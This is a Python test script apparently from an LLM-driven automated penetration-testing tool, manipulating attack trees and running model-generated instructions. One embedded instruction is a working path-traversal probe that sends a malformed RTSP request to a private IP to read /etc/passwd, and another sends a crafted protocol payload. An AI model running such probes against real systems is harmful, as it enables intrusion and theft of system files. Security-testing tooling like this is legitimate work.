You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
166 lines
5.4 KiB
166 lines
5.4 KiB
import re
|
|
import subprocess
|
|
import tempfile
|
|
import os
|
|
import pexpect
|
|
import struct
|
|
import sys
|
|
import mysql.connector
|
|
import requests
|
|
from mycode.LLMManager import LLMManager
|
|
from mycode.TaskObject import TaskObject
|
|
from myutils.PickleManager import g_PKM
|
|
from mycode.InstructionManager import g_instrM
|
|
from mycode.TaskManager import g_TaskM
|
|
from mycode.PythonTManager import PythonTManager
|
|
from myutils.ConfigManager import myCongif
|
|
from mycode.DBManager import app_DBM
|
|
import textwrap
|
|
|
|
|
|
class Mytest:
|
|
def update_node_inter(self,attack_index):
|
|
attack_tree = g_PKM.ReadData(attack_index)
|
|
nodes = attack_tree.traverse_dfs()
|
|
# 06-0=>p
|
|
instr = nodes[6].get_instr_user().pop(0)
|
|
nodes[6].parent.get_instr_user().append(instr)
|
|
# 39-1
|
|
instr = nodes[39].get_instr_user().pop(1)
|
|
nodes[39].parent.get_instr_user().append(instr)
|
|
# 49-0
|
|
instr = nodes[49].get_instr_user().pop(0)
|
|
nodes[49].parent.get_instr_user().append(instr)
|
|
|
|
g_PKM.WriteData(attack_tree, attack_index)
|
|
|
|
|
|
def dynamic_fun(self):
|
|
import socket
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.settimeout(20) # 增加超时时间
|
|
s.connect(("192.168.3.105", 52989))
|
|
|
|
# 基于返回的 "99 -1 45973" 字符串构造特殊payload
|
|
special_cmd = b'99\\x01\\x00\\x00\\x00' # 模拟协议头
|
|
s.sendall(special_cmd)
|
|
|
|
response = s.recv(2048)
|
|
s.close()
|
|
|
|
return (True, f"SpecialCmd Response: {response.hex()}")
|
|
except Exception as e:
|
|
return (False, str(e))
|
|
|
|
def do_test(self):
|
|
pass
|
|
|
|
def tmp_test(self):
|
|
list_a = [0,1,2,3,4,5,6,7,8,9]
|
|
|
|
isart = len(list_a) - 4 # 正常应该都是两个两个
|
|
if isart % 2 != 0:
|
|
print("c_msg数量不对称,需要检查逻辑!")
|
|
for msg in list_a[isart:]:
|
|
print(msg)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
# 示例使用
|
|
mytest = Mytest()
|
|
LLM = LLMManager(1)
|
|
current_path = os.path.dirname(os.path.realpath(__file__))
|
|
print(current_path)
|
|
test_type = 1
|
|
task_id = 49
|
|
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
|
|
|
|
if test_type == 0:
|
|
mytest.dynamic_fun()
|
|
elif test_type == 1:
|
|
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
|
|
instruction = '''python-code
|
|
def dynamic_fun():
|
|
import socket
|
|
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.settimeout(20) # 设置超时时间为20秒
|
|
s.connect(("192.168.3.105", 11200))
|
|
|
|
# 发送畸形RTSP请求探测边界条件
|
|
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
|
|
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
|
|
|
|
s.send(payload.encode())
|
|
response = s.recv(4096).decode()
|
|
|
|
s.close()
|
|
|
|
if "404" in response:
|
|
return (False, "存在输入过滤机制")
|
|
elif "root:" in response:
|
|
return (True, "成功读取敏感文件")
|
|
else:
|
|
return (False, f"未知响应:{response}")
|
|
|
|
except Exception as e:
|
|
return (False, f"连接异常:{str(e)}")
|
|
'''
|
|
task_Object.PythonM.start_pool() #开个子进程池就行
|
|
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
|
|
# 暂存结果
|
|
oneres = {'执行指令': instr, '结果': reslut}
|
|
print("----执行结果----")
|
|
print(reslut)
|
|
elif test_type == 2: #给节点添加指令
|
|
node_path = "目标系统->192.168.3.105->52989端口"
|
|
instr_id = 3233
|
|
g_TaskM.load_tasks()
|
|
task = g_TaskM.tasks[task_id]
|
|
nodes = task.attack_tree.traverse_dfs()
|
|
cur_node = None
|
|
for node in nodes:
|
|
if node.path == node_path:
|
|
cur_node = node
|
|
break
|
|
if cur_node:
|
|
str_instr = app_DBM.get_one_instr(instr_id)
|
|
if "import" in str_instr:
|
|
str_instr = "python-code " + str_instr
|
|
cur_node.test_add_instr(str_instr)
|
|
cur_node.update_work_status(1)
|
|
#保存数据
|
|
g_PKM.WriteData(task.attack_tree,str(task.task_id))
|
|
else:
|
|
print("没找到节点!")
|
|
elif test_type ==3: #测试指令入节点
|
|
strinstr = '''
|
|
|
|
'''
|
|
strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
|
|
nodes = strNodes.split(', ')
|
|
unique_names = list(set(nodes)) # 去重
|
|
for node_name in unique_names:
|
|
print(node_name)
|
|
elif test_type == 4: # 修改Messages
|
|
attact_tree = g_PKM.ReadData("27")
|
|
# 创建一个新的节点
|
|
from mycode.AttackMap import TreeNode
|
|
testnode = TreeNode("test", 0)
|
|
LLM.build_initial_prompt(testnode) # 新的Message
|
|
systems = testnode.parent_messages[0]["content"]
|
|
# print(systems)
|
|
# 遍历node,查看有instr的ndoe
|
|
nodes = attact_tree.traverse_bfs()
|
|
for node in nodes:
|
|
node.parent_messages[0]["content"] = systems
|
|
g_PKM.WriteData(attact_tree, "27")
|
|
print("完成Messgae更新")
|
|
elif test_type ==5:
|
|
mytest.dynamic_fun()
|
|
elif test_type == 6:
|
|
mytest.tmp_test()
|
|
else:
|
|
pass
|
|
|